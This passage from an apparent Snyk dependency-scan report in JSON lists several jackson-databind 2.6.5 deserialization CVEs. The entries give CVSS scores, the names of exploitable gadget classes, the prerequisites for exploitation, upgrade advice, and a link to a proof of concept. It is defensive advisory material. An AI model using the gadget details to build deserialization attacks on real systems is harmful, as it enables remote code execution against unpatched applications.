"type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "severityWithCritical": 
"high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - 
"severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - 
"severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - 
"severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
